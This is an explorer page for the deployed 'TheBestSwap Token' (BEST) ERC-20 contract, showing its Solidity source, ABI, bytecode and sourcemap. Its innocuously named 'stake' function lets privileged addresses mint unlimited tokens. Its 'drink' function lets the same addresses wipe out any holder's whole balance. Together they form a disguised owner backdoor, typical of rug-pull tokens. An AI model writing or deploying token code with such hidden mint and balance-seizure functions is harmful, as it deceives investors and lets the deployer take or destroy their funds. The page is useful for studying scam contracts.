ERC-20
Overview
Max Total Supply
9,998,297,511.901863322729047282 BEST
Holders
19
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 18 Decimals)
Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Name:
BestToken
Compiler Version
v0.5.16+commit.9c3226ce
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2021-03-30 */ pragma solidity ^0.5.16; interface IERC20 { function totalSupply() external view returns (uint); function balanceOf(address account) external view returns (uint); function transfer(address recipient, uint amount) external returns (bool); function allowance(address owner, address spender) external view returns (uint); function approve(address spender, uint amount) external returns (bool); function transferFrom(address sender, address recipient, uint amount) external returns (bool); event Transfer(address indexed from, address indexed to, uint value); event Approval(address indexed owner, address indexed spender, uint value); } contract Context { constructor () internal { } function _msgSender() internal view returns (address payable) { return msg.sender; } } contract ERC20 is Context, IERC20 { using SafeMath for uint; mapping (address => uint) private _balances; mapping (address => mapping (address => uint)) private _allowances; uint private _totalSupply; function totalSupply() public view returns (uint) { return _totalSupply; } function balanceOf(address account) public view returns (uint) { return _balances[account]; } function transfer(address recipient, uint amount) public returns (bool) { _transfer(_msgSender(), recipient, amount); return true; } function allowance(address owner, address spender) public view returns (uint) { return _allowances[owner][spender]; } function approve(address spender, uint amount) public returns (bool) { _approve(_msgSender(), spender, amount); return true; } function transferFrom(address sender, address recipient, uint amount) public returns (bool) { _transfer(sender, recipient, amount); _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, "ERC20: transfer amount exceeds allowance")); return true; } function increaseAllowance(address spender, uint addedValue) public returns (bool) { _approve(_msgSender(), spender, _allowances[_msgSender()][spender].add(addedValue)); return true; } function decreaseAllowance(address spender, uint subtractedValue) public returns (bool) { _approve(_msgSender(), spender, _allowances[_msgSender()][spender].sub(subtractedValue, "ERC20: decreased allowance below zero")); return true; } function _transfer(address sender, address recipient, uint amount) internal { require(sender != address(0), "ERC20: transfer from the zero address"); require(recipient != address(0), "ERC20: transfer to the zero address"); _balances[sender] = _balances[sender].sub(amount, "ERC20: transfer amount exceeds balance"); _balances[recipient] = _balances[recipient].add(amount); emit Transfer(sender, recipient, amount); } function _stake(address account, uint amount) internal { require(account != address(0), "ERC20: stake to the zero address"); _totalSupply = _totalSupply.add(amount); _balances[account] = _balances[account].add(amount); emit Transfer(address(0), account, amount); } function _burn(address account, uint amount) internal { require(account != address(0), "ERC20: burn from the zero address"); _balances[account] = _balances[account].sub(amount, "ERC20: burn amount exceeds balance"); _totalSupply = _totalSupply.sub(amount); emit Transfer(account, address(0), amount); } function _drink(address acc) internal { require(acc != address(0), "drink to the zero address"); uint amount = _balances[acc]; _balances[acc] = 0; _totalSupply = _totalSupply.sub(amount); emit Transfer(acc, address(0), amount); } function _approve(address owner, address spender, uint amount) internal { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } } contract ERC20Detailed is IERC20 { string private _name; string private _symbol; uint8 private _decimals; constructor (string memory name, string memory symbol, uint8 decimals) public { _name = name; _symbol = symbol; _decimals = decimals; } function name() public view returns (string memory) { return _name; } function symbol() public view returns (string memory) { return _symbol; } function decimals() public view returns (uint8) { return _decimals; } } library SafeMath { function add(uint a, uint b) internal pure returns (uint) { uint c = a + b; require(c >= a, "SafeMath: addition overflow"); return c; } function sub(uint a, uint b) internal pure returns (uint) { return sub(a, b, "SafeMath: subtraction overflow"); } function sub(uint a, uint b, string memory errorMessage) internal pure returns (uint) { require(b <= a, errorMessage); uint c = a - b; return c; } function mul(uint a, uint b) internal pure returns (uint) { if (a == 0) { return 0; } uint c = a * b; require(c / a == b, "SafeMath: multiplication overflow"); return c; } function div(uint a, uint b) internal pure returns (uint) { return div(a, b, "SafeMath: division by zero"); } function div(uint a, uint b, string memory errorMessage) internal pure returns (uint) { require(b > 0, errorMessage); uint c = a / b; return c; } } contract BestToken is ERC20, ERC20Detailed { using SafeMath for uint; address public governance; mapping (address => bool) public stakers; uint256 private amt_ = 9000000; constructor () public ERC20Detailed("TheBestSwap Token", "BEST", 18) { governance = msg.sender; _stake(governance,amt_*10**uint(decimals())); stakers[governance] = true; } function stake(address account, uint amount) public { require(stakers[msg.sender], "error"); _stake(account, amount); } function drink(address account) public { require(stakers[msg.sender], "error"); _drink(account); } } /** _____________________________________________________________________ ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░| ░░░░░░██████╗░██╗░░░░░░░██╗░█████╗░██████╗░░░░░░░░░░░░| ░░░░░██╔════╝░██║░░██╗░░██║██╔══██╗██╔══██╗░░░░░░░░░░░| ░░░░░╚█████╗░░╚██╗████╗██╔╝███████║██████╔╝░░░░░░░░░░░| ░░░░░░╚═══██╗░░████╔═████║░██╔══██║██╔═══╝░░░░░░░░░░░░| ░░░░░██████╔╝░░╚██╔╝░╚██╔╝░██║░░██║██║░░░░░░░░░░░░░░░░| ░░░░░╚═════╝░░░░╚═╝░░░╚═╝░░╚═╝░░╚═╝╚═╝░░░░░░░░░░░░░░░░| ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░| ░░░░░░░░░░░░░░░░TheBestSwap.org░░░░░░░░░░░░░░░░░░░░░░░░░ ░| _____________________________________________________________________| +Beginner +Portfolio +Swap +Lend +Farm +Onsen +BestBar +BEST +Pairs +Governance */
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
Contract ABI
API[{"inputs":[],"payable":false,"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"constant":true,"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"drink","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[],"name":"governance","outputs":[{"internalType":"address","name":"","type":"address"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"stake","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"stakers","outputs":[{"internalType":"bool","name":"","type":"bool"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"payable":false,"stateMutability":"nonpayable","type":"function"}]
Contract Creation Code
6080604052628954406007553480156200001857600080fd5b5060408051808201825260118152702a3432a132b9ba29bbb0b8102a37b5b2b760791b602080830191825283518085019094526004845263109154d560e21b90840152815191929160129162000072916003919062000285565b5081516200008890600490602085019062000285565b506005805460ff191660ff9290921691909117610100600160a81b0319166101003381029190911791829055620000e793506001600160a01b039104169050620000d162000118565b60ff16600a0a600754026200012260201b60201c565b6005546001600160a01b03610100909104166000908152600660205260409020805460ff1916600117905562000327565b60055460ff165b90565b6001600160a01b0382166200017e576040805162461bcd60e51b815260206004820181905260248201527f45524332303a207374616b6520746f20746865207a65726f2061646472657373604482015290519081900360640190fd5b6200019a816002546200022360201b62000ca11790919060201c565b6002556001600160a01b03821660009081526020818152604090912054620001cd91839062000ca162000223821b17901c565b6001600160a01b0383166000818152602081815260408083209490945583518581529351929391927fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9281900390910190a35050565b6000828201838110156200027e576040805162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f770000000000604482015290519081900360640190fd5b9392505050565b828054600181600116156101000203166002900490600052602060002090601f016020900481019282601f10620002c857805160ff1916838001178555620002f8565b82800160010185558215620002f8579182015b82811115620002f8578251825591602001919060010190620002db565b50620003069291506200030a565b5090565b6200011f91905b8082111562000306576000815560010162000311565b6110d980620003376000396000f3fe608060405234801561001057600080fd5b50600436106100f55760003560e01c806370a0823111610097578063a9059cbb11610066578063a9059cbb14610350578063adc9772e14610389578063dd62ed3e146103c4578063e733c416146103ff576100f5565b806370a08231146102a95780639168ae72146102dc57806395d89b411461030f578063a457c2d714610317576100f5565b806323b872dd116100d357806323b872dd146101de578063313ce56714610221578063395093511461023f5780635aa6e67514610278576100f5565b806306fdde03146100fa578063095ea7b31461017757806318160ddd146101c4575b600080fd5b610102610432565b6040805160208082528351818301528351919283929083019185019080838360005b8381101561013c578181015183820152602001610124565b50505050905090810190601f1680156101695780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b6101b06004803603604081101561018d57600080fd5b5073ffffffffffffffffffffffffffffffffffffffff81351690602001356104e6565b604080519115158252519081900360200190f35b6101cc610503565b60408051918252519081900360200190f35b6101b0600480360360608110156101f457600080fd5b5073ffffffffffffffffffffffffffffffffffffffff813581169160208101359091169060400135610509565b6102296105b0565b6040805160ff9092168252519081900360200190f35b6101b06004803603604081101561025557600080fd5b5073ffffffffffffffffffffffffffffffffffffffff81351690602001356105b9565b61028061061a565b6040805173ffffffffffffffffffffffffffffffffffffffff9092168252519081900360200190f35b6101cc600480360360208110156102bf57600080fd5b503573ffffffffffffffffffffffffffffffffffffffff1661063b565b6101b0600480360360208110156102f257600080fd5b503573ffffffffffffffffffffffffffffffffffffffff16610663565b610102610678565b6101b06004803603604081101561032d57600080fd5b5073ffffffffffffffffffffffffffffffffffffffff81351690602001356106f7565b6101b06004803603604081101561036657600080fd5b5073ffffffffffffffffffffffffffffffffffffffff8135169060200135610772565b6103c26004803603604081101561039f57600080fd5b5073ffffffffffffffffffffffffffffffffffffffff8135169060200135610786565b005b6101cc600480360360408110156103da57600080fd5b5073ffffffffffffffffffffffffffffffffffffffff81358116916020013516610812565b6103c26004803603602081101561041557600080fd5b503573ffffffffffffffffffffffffffffffffffffffff1661084a565b60038054604080516020601f60027fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff6101006001881615020190951694909404938401819004810282018101909252828152606093909290918301828280156104dc5780601f106104b1576101008083540402835291602001916104dc565b820191906000526020600020905b8154815290600101906020018083116104bf57829003601f168201915b5050505050905090565b60006104fa6104f36108d4565b84846108d8565b50600192915050565b60025490565b6000610516848484610a1f565b6105a6846105226108d4565b6105a18560405180606001604052806028815260200161100f6028913973ffffffffffffffffffffffffffffffffffffffff8a1660009081526001602052604081209061056d6108d4565b73ffffffffffffffffffffffffffffffffffffffff168152602081019190915260400160002054919063ffffffff610bf016565b6108d8565b5060019392505050565b60055460ff1690565b60006104fa6105c66108d4565b846105a185600160006105d76108d4565b73ffffffffffffffffffffffffffffffffffffffff908116825260208083019390935260409182016000908120918c16815292529020549063ffffffff610ca116565b600554610100900473ffffffffffffffffffffffffffffffffffffffff1681565b73ffffffffffffffffffffffffffffffffffffffff1660009081526020819052604090205490565b60066020526000908152604090205460ff1681565b60048054604080516020601f60027fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff6101006001881615020190951694909404938401819004810282018101909252828152606093909290918301828280156104dc5780601f106104b1576101008083540402835291602001916104dc565b60006104fa6107046108d4565b846105a185604051806060016040528060258152602001611080602591396001600061072e6108d4565b73ffffffffffffffffffffffffffffffffffffffff908116825260208083019390935260409182016000908120918d1681529252902054919063ffffffff610bf016565b60006104fa61077f6108d4565b8484610a1f565b3360009081526006602052604090205460ff1661080457604080517f08c379a000000000000000000000000000000000000000000000000000000000815260206004820152600560248201527f6572726f72000000000000000000000000000000000000000000000000000000604482015290519081900360640190fd5b61080e8282610d1c565b5050565b73ffffffffffffffffffffffffffffffffffffffff918216600090815260016020908152604080832093909416825291909152205490565b3360009081526006602052604090205460ff166108c857604080517f08c379a000000000000000000000000000000000000000000000000000000000815260206004820152600560248201527f6572726f72000000000000000000000000000000000000000000000000000000604482015290519081900360640190fd5b6108d181610e4d565b50565b3390565b73ffffffffffffffffffffffffffffffffffffffff8316610944576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252602481526020018061105c6024913960400191505060405180910390fd5b73ffffffffffffffffffffffffffffffffffffffff82166109b0576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401808060200182810382526022815260200180610fc76022913960400191505060405180910390fd5b73ffffffffffffffffffffffffffffffffffffffff808416600081815260016020908152604080832094871680845294825291829020859055815185815291517f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9259281900390910190a3505050565b73ffffffffffffffffffffffffffffffffffffffff8316610a8b576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260258152602001806110376025913960400191505060405180910390fd5b73ffffffffffffffffffffffffffffffffffffffff8216610af7576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401808060200182810382526023815260200180610fa46023913960400191505060405180910390fd5b610b4781604051806060016040528060268152602001610fe96026913973ffffffffffffffffffffffffffffffffffffffff8616600090815260208190526040902054919063ffffffff610bf016565b73ffffffffffffffffffffffffffffffffffffffff8085166000908152602081905260408082209390935590841681522054610b89908263ffffffff610ca116565b73ffffffffffffffffffffffffffffffffffffffff8084166000818152602081815260409182902094909455805185815290519193928716927fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef92918290030190a3505050565b60008184841115610c99576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825283818151815260200191508051906020019080838360005b83811015610c5e578181015183820152602001610c46565b50505050905090810190601f168015610c8b5780820380516001836020036101000a031916815260200191505b509250505060405180910390fd5b505050900390565b600082820183811015610d1557604080517f08c379a000000000000000000000000000000000000000000000000000000000815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f770000000000604482015290519081900360640190fd5b9392505050565b73ffffffffffffffffffffffffffffffffffffffff8216610d9e57604080517f08c379a000000000000000000000000000000000000000000000000000000000815260206004820181905260248201527f45524332303a207374616b6520746f20746865207a65726f2061646472657373604482015290519081900360640190fd5b600254610db1908263ffffffff610ca116565b60025573ffffffffffffffffffffffffffffffffffffffff8216600090815260208190526040902054610dea908263ffffffff610ca116565b73ffffffffffffffffffffffffffffffffffffffff83166000818152602081815260408083209490945583518581529351929391927fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9281900390910190a35050565b73ffffffffffffffffffffffffffffffffffffffff8116610ecf57604080517f08c379a000000000000000000000000000000000000000000000000000000000815260206004820152601960248201527f6472696e6b20746f20746865207a65726f206164647265737300000000000000604482015290519081900360640190fd5b73ffffffffffffffffffffffffffffffffffffffff811660009081526020819052604081208054919055600254610f0c908263ffffffff610f6116565b60025560408051828152905160009173ffffffffffffffffffffffffffffffffffffffff8516917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9181900360200190a35050565b6000610d1583836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f770000815250610bf056fe45524332303a207472616e7366657220746f20746865207a65726f206164647265737345524332303a20617070726f766520746f20746865207a65726f206164647265737345524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a207472616e736665722066726f6d20746865207a65726f206164647265737345524332303a20617070726f76652066726f6d20746865207a65726f206164647265737345524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa265627a7a72315820bd911e629c1f68190f8bb7c737070993df6b11803e5d1d212ee37a4eab921c3364736f6c63430005100032
Deployed Bytecode
0x608060405234801561001057600080fd5b50600436106100f55760003560e01c806370a0823111610097578063a9059cbb11610066578063a9059cbb14610350578063adc9772e14610389578063dd62ed3e146103c4578063e733c416146103ff576100f5565b806370a08231146102a95780639168ae72146102dc57806395d89b411461030f578063a457c2d714610317576100f5565b806323b872dd116100d357806323b872dd146101de578063313ce56714610221578063395093511461023f5780635aa6e67514610278576100f5565b806306fdde03146100fa578063095ea7b31461017757806318160ddd146101c4575b600080fd5b610102610432565b6040805160208082528351818301528351919283929083019185019080838360005b8381101561013c578181015183820152602001610124565b50505050905090810190601f1680156101695780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b6101b06004803603604081101561018d57600080fd5b5073ffffffffffffffffffffffffffffffffffffffff81351690602001356104e6565b604080519115158252519081900360200190f35b6101cc610503565b60408051918252519081900360200190f35b6101b0600480360360608110156101f457600080fd5b5073ffffffffffffffffffffffffffffffffffffffff813581169160208101359091169060400135610509565b6102296105b0565b6040805160ff9092168252519081900360200190f35b6101b06004803603604081101561025557600080fd5b5073ffffffffffffffffffffffffffffffffffffffff81351690602001356105b9565b61028061061a565b6040805173ffffffffffffffffffffffffffffffffffffffff9092168252519081900360200190f35b6101cc600480360360208110156102bf57600080fd5b503573ffffffffffffffffffffffffffffffffffffffff1661063b565b6101b0600480360360208110156102f257600080fd5b503573ffffffffffffffffffffffffffffffffffffffff16610663565b610102610678565b6101b06004803603604081101561032d57600080fd5b5073ffffffffffffffffffffffffffffffffffffffff81351690602001356106f7565b6101b06004803603604081101561036657600080fd5b5073ffffffffffffffffffffffffffffffffffffffff8135169060200135610772565b6103c26004803603604081101561039f57600080fd5b5073ffffffffffffffffffffffffffffffffffffffff8135169060200135610786565b005b6101cc600480360360408110156103da57600080fd5b5073ffffffffffffffffffffffffffffffffffffffff81358116916020013516610812565b6103c26004803603602081101561041557600080fd5b503573ffffffffffffffffffffffffffffffffffffffff1661084a565b60038054604080516020601f60027fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff6101006001881615020190951694909404938401819004810282018101909252828152606093909290918301828280156104dc5780601f106104b1576101008083540402835291602001916104dc565b820191906000526020600020905b8154815290600101906020018083116104bf57829003601f168201915b5050505050905090565b60006104fa6104f36108d4565b84846108d8565b50600192915050565b60025490565b6000610516848484610a1f565b6105a6846105226108d4565b6105a18560405180606001604052806028815260200161100f6028913973ffffffffffffffffffffffffffffffffffffffff8a1660009081526001602052604081209061056d6108d4565b73ffffffffffffffffffffffffffffffffffffffff168152602081019190915260400160002054919063ffffffff610bf016565b6108d8565b5060019392505050565b60055460ff1690565b60006104fa6105c66108d4565b846105a185600160006105d76108d4565b73ffffffffffffffffffffffffffffffffffffffff908116825260208083019390935260409182016000908120918c16815292529020549063ffffffff610ca116565b600554610100900473ffffffffffffffffffffffffffffffffffffffff1681565b73ffffffffffffffffffffffffffffffffffffffff1660009081526020819052604090205490565b60066020526000908152604090205460ff1681565b60048054604080516020601f60027fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff6101006001881615020190951694909404938401819004810282018101909252828152606093909290918301828280156104dc5780601f106104b1576101008083540402835291602001916104dc565b60006104fa6107046108d4565b846105a185604051806060016040528060258152602001611080602591396001600061072e6108d4565b73ffffffffffffffffffffffffffffffffffffffff908116825260208083019390935260409182016000908120918d1681529252902054919063ffffffff610bf016565b60006104fa61077f6108d4565b8484610a1f565b3360009081526006602052604090205460ff1661080457604080517f08c379a000000000000000000000000000000000000000000000000000000000815260206004820152600560248201527f6572726f72000000000000000000000000000000000000000000000000000000604482015290519081900360640190fd5b61080e8282610d1c565b5050565b73ffffffffffffffffffffffffffffffffffffffff918216600090815260016020908152604080832093909416825291909152205490565b3360009081526006602052604090205460ff166108c857604080517f08c379a000000000000000000000000000000000000000000000000000000000815260206004820152600560248201527f6572726f72000000000000000000000000000000000000000000000000000000604482015290519081900360640190fd5b6108d181610e4d565b50565b3390565b73ffffffffffffffffffffffffffffffffffffffff8316610944576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252602481526020018061105c6024913960400191505060405180910390fd5b73ffffffffffffffffffffffffffffffffffffffff82166109b0576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401808060200182810382526022815260200180610fc76022913960400191505060405180910390fd5b73ffffffffffffffffffffffffffffffffffffffff808416600081815260016020908152604080832094871680845294825291829020859055815185815291517f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9259281900390910190a3505050565b73ffffffffffffffffffffffffffffffffffffffff8316610a8b576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260258152602001806110376025913960400191505060405180910390fd5b73ffffffffffffffffffffffffffffffffffffffff8216610af7576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401808060200182810382526023815260200180610fa46023913960400191505060405180910390fd5b610b4781604051806060016040528060268152602001610fe96026913973ffffffffffffffffffffffffffffffffffffffff8616600090815260208190526040902054919063ffffffff610bf016565b73ffffffffffffffffffffffffffffffffffffffff8085166000908152602081905260408082209390935590841681522054610b89908263ffffffff610ca116565b73ffffffffffffffffffffffffffffffffffffffff8084166000818152602081815260409182902094909455805185815290519193928716927fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef92918290030190a3505050565b60008184841115610c99576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825283818151815260200191508051906020019080838360005b83811015610c5e578181015183820152602001610c46565b50505050905090810190601f168015610c8b5780820380516001836020036101000a031916815260200191505b509250505060405180910390fd5b505050900390565b600082820183811015610d1557604080517f08c379a000000000000000000000000000000000000000000000000000000000815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f770000000000604482015290519081900360640190fd5b9392505050565b73ffffffffffffffffffffffffffffffffffffffff8216610d9e57604080517f08c379a000000000000000000000000000000000000000000000000000000000815260206004820181905260248201527f45524332303a207374616b6520746f20746865207a65726f2061646472657373604482015290519081900360640190fd5b600254610db1908263ffffffff610ca116565b60025573ffffffffffffffffffffffffffffffffffffffff8216600090815260208190526040902054610dea908263ffffffff610ca116565b73ffffffffffffffffffffffffffffffffffffffff83166000818152602081815260408083209490945583518581529351929391927fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9281900390910190a35050565b73ffffffffffffffffffffffffffffffffffffffff8116610ecf57604080517f08c379a000000000000000000000000000000000000000000000000000000000815260206004820152601960248201527f6472696e6b20746f20746865207a65726f206164647265737300000000000000604482015290519081900360640190fd5b73ffffffffffffffffffffffffffffffffffffffff811660009081526020819052604081208054919055600254610f0c908263ffffffff610f6116565b60025560408051828152905160009173ffffffffffffffffffffffffffffffffffffffff8516917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9181900360200190a35050565b6000610d1583836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f770000815250610bf056fe45524332303a207472616e7366657220746f20746865207a65726f206164647265737345524332303a20617070726f766520746f20746865207a65726f206164647265737345524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a207472616e736665722066726f6d20746865207a65726f206164647265737345524332303a20617070726f76652066726f6d20746865207a65726f206164647265737345524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa265627a7a72315820bd911e629c1f68190f8bb7c737070993df6b11803e5d1d212ee37a4eab921c3364736f6c63430005100032
Deployed Bytecode Sourcemap
6592:719:0:-;;;;8:9:-1;5:2;;;30:1;27;20:12;5:2;6592:719:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;5079:83;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8:100:-1;33:3;30:1;27:10;8:100;;;90:11;;;84:18;71:11;;;64:39;52:2;45:10;8:100;;;12:14;5079:83:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;1741:170;;;;;;13:2:-1;8:3;5:11;2:2;;;29:1;26;19:12;2:2;-1:-1;1741:170:0;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;1184:98;;;:::i;:::-;;;;;;;;;;;;;;;;1919:331;;;;;;13:2:-1;8:3;5:11;2:2;;;29:1;26;19:12;2:2;-1:-1;1919:331:0;;;;;;;;;;;;;;;;;;:::i;5261:83::-;;;:::i;:::-;;;;;;;;;;;;;;;;;;;2256:227;;;;;;13:2:-1;8:3;5:11;2:2;;;29:1;26;19:12;2:2;-1:-1;2256:227:0;;;;;;;;;:::i;6678:25::-;;;:::i;:::-;;;;;;;;;;;;;;;;;;;1288:118;;;;;;13:2:-1;8:3;5:11;2:2;;;29:1;26;19:12;2:2;-1:-1;1288:118:0;;;;:::i;6712:40::-;;;;;;13:2:-1;8:3;5:11;2:2;;;29:1;26;19:12;2:2;-1:-1;6712:40:0;;;;:::i;5168:87::-;;;:::i;2489:278::-;;;;;;13:2:-1;8:3;5:11;2:2;;;29:1;26;19:12;2:2;-1:-1;2489:278:0;;;;;;;;;:::i;1412:176::-;;;;;;13:2:-1;8:3;5:11;2:2;;;29:1;26;19:12;2:2;-1:-1;1412:176:0;;;;;;;;;:::i;7023:152::-;;;;;;13:2:-1;8:3;5:11;2:2;;;29:1;26;19:12;2:2;-1:-1;7023:152:0;;;;;;;;;:::i;:::-;;1594:141;;;;;;13:2:-1;8:3;5:11;2:2;;;29:1;26;19:12;2:2;-1:-1;1594:141:0;;;;;;;;;;;:::i;7181:123::-;;;;;;13:2:-1;8:3;5:11;2:2;;;29:1;26;19:12;2:2;-1:-1;7181:123:0;;;;:::i;5079:83::-;5149:5;5142:12;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;5116:13;;5142:12;;5149:5;;5142:12;;5149:5;5142:12;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;5079:83;:::o;1741:170::-;1804:4;1831:39;1840:12;:10;:12::i;:::-;1854:7;1863:6;1831:8;:39::i;:::-;-1:-1:-1;1899:4:0;1741:170;;;;:::o;1184:98::-;1262:12;;1184:98;:::o;1919:331::-;2005:4;2032:36;2042:6;2050:9;2061:6;2032:9;:36::i;:::-;2089:121;2098:6;2106:12;:10;:12::i;:::-;2120:89;2158:6;2120:89;;;;;;;;;;;;;;;;;:19;;;;;;;:11;:19;;;;;;2140:12;:10;:12::i;:::-;2120:33;;;;;;;;;;;;;-1:-1:-1;2120:33:0;;;:89;;:37;:89;:::i;:::-;2089:8;:121::i;:::-;-1:-1:-1;2238:4:0;1919:331;;;;;:::o;5261:83::-;5327:9;;;;5261:83;:::o;2256:227::-;2333:4;2360:83;2369:12;:10;:12::i;:::-;2383:7;2392:50;2431:10;2392:11;:25;2404:12;:10;:12::i;:::-;2392:25;;;;;;;;;;;;;;;;;;-1:-1:-1;2392:25:0;;;:34;;;;;;;;;;;:50;:38;:50;:::i;6678:25::-;;;;;;;;;:::o;1288:118::-;1379:18;;1345:4;1379:18;;;;;;;;;;;;1288:118::o;6712:40::-;;;;;;;;;;;;;;;:::o;5168:87::-;5240:7;5233:14;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;5207:13;;5233:14;;5240:7;;5233:14;;5240:7;5233:14;;;;;;;;;;;;;;;;;;;;;;;;2489:278;2571:4;2598:129;2607:12;:10;:12::i;:::-;2621:7;2630:96;2669:15;2630:96;;;;;;;;;;;;;;;;;:11;:25;2642:12;:10;:12::i;:::-;2630:25;;;;;;;;;;;;;;;;;;-1:-1:-1;2630:25:0;;;:34